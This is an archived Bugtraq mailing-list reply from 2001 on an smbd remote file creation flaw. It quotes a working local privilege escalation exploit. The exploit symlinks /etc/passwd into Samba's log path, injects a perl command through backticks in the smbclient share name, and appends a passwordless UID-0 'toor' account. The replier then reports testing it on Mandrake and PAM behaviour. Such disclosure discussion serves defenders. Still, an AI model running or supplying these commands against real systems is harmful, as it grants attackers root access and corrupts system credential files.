Bugtraq mailing list archives
Re: smbd remote file creation vulnerability
From: maniac () localhost sk
Date: Mon, 25 Jun 2001 00:14:02 +0200
Exploit: This is the scenario of local privilege escalation attack against RedHat 7.x installation: $ ln -s /etc/passwd /tmp/x.log $ smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \ -n ../../../tmp/x -N ...where 'NIMUE' stands for local host name (few error messages should be returned). $ su toor #
Hi, Mandrake 7.1 (Mandrake 8.0 and RedHat6.2) defaultly logs here: /var/log/samba/log.%m I replaced it with /var/log/samba/%m.log and used your exploit, which worked - into /etc/passwd was appended also line: toor::0:0::/:/bin/sh But until there was that two spaces onto begining of line, it was impossible to su to that account, this is error message: Jun 24 23:28:55 localhost PAM_pwdb[23844]: check pass; user unknown I tried to insert \r after the first \n, but unsucessfully. I'm using pam-0.72-7mdk. This versions of PAM also don't permit spaces on begining of line: pam-0.72-20.6.x (Redhat6.2) pam-0.74-6mdk (Mandrake8.0( Maybe sshd without PAM support and permitting empty password may be 'vulnerable' on such systems. maniac
Current thread:
- smbd remote file creation vulnerability Michal Zalewski (Jun 24)
- Re: smbd remote file creation vulnerability maniac (Jun 25)
- Re: smbd remote file creation vulnerability Pavol Luptak (Jun 25)
- Re: smbd remote file creation vulnerability Jarno Huuskonen (Jun 26)
- Re: smbd remote file creation vulnerability Pavol Luptak (Jun 26)
- Re: smbd remote file creation vulnerability Simple Nomad (Jun 27)
- Re: smbd remote file creation vulnerability Olaf Kirch (Jun 28)
- Re: smbd remote file creation vulnerability Simple Nomad (Jun 28)
- Re: smbd remote file creation vulnerability Pavol Luptak (Jun 25)
- Re: smbd remote file creation vulnerability maniac (Jun 25)
- Re: smbd remote file creation vulnerability Tomek Lipski (Jun 26)
- Re: smbd remote file creation vulnerability Wichert Akkerman (Jun 27)
- Re: smbd remote file creation vulnerability Michal Zalewski (Jun 28)
- Re: smbd remote file creation vulnerability Steve Beattie (Jun 28)